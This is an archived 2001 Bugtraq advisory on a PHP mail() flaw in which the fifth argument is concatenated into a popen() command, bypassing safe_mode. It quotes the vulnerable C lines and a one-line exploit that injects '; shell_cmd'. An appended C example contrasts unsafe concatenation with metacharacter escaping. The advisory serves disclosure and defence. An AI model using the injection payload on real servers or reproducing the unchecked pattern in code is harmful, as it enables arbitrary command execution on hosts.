[21607] in bugtraq


php mail function bypass safe_mode restriction

daemon@ATHENA.MIT.EDU (Laurent Sintes)
Wed Jul 18 12:19:32 2001

Date: Wed, 18 Jul 2001 02:53:57 +0200
From: Laurent Sintes <sintes@nfrance.com>
To: bugtraq@securityfocus.com
Message-ID: <20010718025357.A19592@albertine.nfrance.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

The php mail() function does not check for shell command escapes,
even if php is running in safe_mode.

So it may be possible to bypass the safe_mode restriction and gain
shell access.

Affected:
php4.0.6
php4.0.5

Significant lines of ext/standard/mail.c:

>extra_cmd = (*argv[4])->value.str.val;
>strcat (sendmail_cmd, extra_cmd);
>sendmail = popen(sendmail_cmd, "w");

Exploit:
mail("toto@toto.com",
     "test",
     "test",
     "test",
     "; shell_cmd");
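
Added example, not part of the original post and not PHP's own code: the unchecked concatenation pattern quoted above next to a variant that backslash-escapes shell metacharacters before the string would reach popen(). The function names, the metacharacter list and the sendmail path are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Assumed metacharacter set; control characters are rejected outright. */
static const char SHELL_META[] = "#&;`|*?~<>^()[]{}$\\\"'";

/* Pattern from the advisory: caller-supplied text is appended verbatim. */
int build_cmd_unsafe(char *dst, size_t cap, const char *base, const char *extra)
{
    int n = snprintf(dst, cap, "%s %s", base, extra);
    return (n < 0 || (size_t)n >= cap) ? -1 : 0;
}

/* Hardened variant: bounded copy, every metacharacter prefixed with '\'. */
int build_cmd_escaped(char *dst, size_t cap, const char *base, const char *extra)
{
    int n = snprintf(dst, cap, "%s ", base);
    if (n < 0 || (size_t)n >= cap)
        return -1;
    size_t o = (size_t)n;
    for (const char *p = extra; *p; p++) {
        if ((unsigned char)*p < 0x20)
            return -1;                       /* newline, tab, etc. */
        int meta = strchr(SHELL_META, *p) != NULL;
        if (o + (size_t)meta + 2 > cap)
            return -1;                       /* no room for '\', char, NUL */
        if (meta)
            dst[o++] = '\\';
        dst[o++] = *p;
    }
    dst[o] = '\0';
    return 0;
}

int main(void)
{
    const char *base = "/usr/sbin/sendmail -t -i";  /* constructed sample */
    const char *extra = "; shell_cmd";              /* value from the post */
    char cmd[128];

    if (build_cmd_unsafe(cmd, sizeof cmd, base, extra) == 0)
        printf("unsafe : %s\n", cmd);   /* ';' would end the sendmail command */
    if (build_cmd_escaped(cmd, sizeof cmd, base, extra) == 0)
        printf("escaped: %s\n", cmd);   /* ';' is now a literal argument */
    return 0;
}
```

Escaping keeps the `;` from starting a second command, but the caller can still pass additional sendmail options, so a restricted environment should also allowlist what the fifth argument may contain.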

